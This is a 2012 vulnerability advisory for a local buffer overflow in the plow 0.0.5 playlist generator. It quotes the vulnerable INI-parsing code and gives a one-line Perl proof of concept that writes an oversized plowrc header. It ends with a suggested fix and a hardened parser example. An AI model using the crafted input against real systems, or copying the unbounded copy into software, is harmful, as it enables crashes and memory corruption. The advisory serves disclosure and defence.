SECURITYVULNS:DOC:28249 (securityvulns), Jul 09, 2012

plow 0.0.5 <= Buffer Overflow Vulnerability

2012-07-09 00:00:00
vulners.com

#################################################
plow 0.0.5 <= Buffer Overflow Vulnerability
#################################################

Discovered by: Jean Pascal Pereira <[email protected]>

Vendor information:

"plow is a command line playlist generator."

Vendor URI: http://developer.berlios.de/projects/plow/

#################################################

Risk-level: Medium

The application is prone to a local buffer overflow vulnerability.


IniParser.cpp, line 26:

26:     char buffer[length];
27:     char group [length];
28:
29:     char *option;
30:     char *value;
31:
32:     while(ini.getline(buffer, length)) {
33:         if(!strlen(buffer) || buffer[0] == '#') {
34:             continue;
35:         }
36:         if(buffer[0] == '[') {
37:             if(buffer[strlen(buffer) - 1] == ']') {
38:                 sprintf(group, "%s", buffer);
39:             } else {
40:                 err = 1;
41:                 break;
42:             }
43:         }


Exploit / Proof Of Concept:

Create a crafted plowrc file:

perl -e '$x="A"x1096;print("[".$x."]\nA=B")' > plowrc


Solution:

Validate input: bound the length of each line read from plowrc before it is copied into the fixed-size buffers shown above.
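The hardened counterpart of the IniParser.cpp excerpt and of the suggested fix, as an added example that is not plow's own code: the same group-header and option logic, but lines are held in std::string and any line at or above an assumed limit (kMaxLine, a constructed value since the page does not give plow's `length`) is rejected instead of being copied into a fixed-size buffer.

```cpp
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Assumed maximum accepted line length (constructed for this example).
const std::size_t kMaxLine = 256;

struct IniEntry {
    std::string group;
    std::string option;
    std::string value;
};

// Returns 0 on success, 1 on a malformed line (as plow's err = 1),
// 2 on a line that exceeds kMaxLine (the oversized crafted header case).
int parseIni(std::istream& ini, std::vector<IniEntry>& out) {
    std::string line, group;
    while (std::getline(ini, line)) {
        if (line.size() >= kMaxLine) return 2;          // refuse oversized input
        if (line.empty() || line[0] == '#') continue;   // skip blanks and comments
        if (line[0] == '[') {
            if (line.back() != ']') return 1;           // header not terminated by ']'
            group = line.substr(1, line.size() - 2);    // std::string grows safely
            continue;
        }
        std::size_t eq = line.find('=');
        if (eq == std::string::npos) return 1;          // option without '='
        out.push_back({group, line.substr(0, eq), line.substr(eq + 1)});
    }
    return 0;
}

// Convenience wrapper so the parser can be driven from an in-memory string.
int parseIniString(const std::string& text, std::vector<IniEntry>& out) {
    std::istringstream in(text);
    return parseIni(in, out);
}
```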


#################################################